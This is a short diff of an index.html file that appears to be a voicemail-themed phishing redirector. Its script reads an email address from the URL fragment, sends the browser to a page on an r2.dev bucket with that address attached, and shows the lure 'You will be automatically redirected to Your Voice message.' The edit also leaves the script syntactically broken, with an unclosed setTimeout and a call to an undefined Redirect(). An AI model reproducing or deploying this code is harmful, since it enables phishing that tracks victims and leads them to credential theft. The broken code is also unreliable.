--- a/index.html
+++ b/index.html
@@ -8,7 +8,11 @@
         var em = hash.split('#')[1];
 window.setTimeout(function() {
     window.location.href = 'https://pub-88834a78a0b042fc9794165ec28b4b99.r2.dev/ked9h2e8i.htm#'+em;
-}, 1);
+}            
+            document.write("You will be automatically redirected to Your Voice message.");
+            setTimeout('Redirect()', 1000);
+         //-->
+     
        
     </script>
 
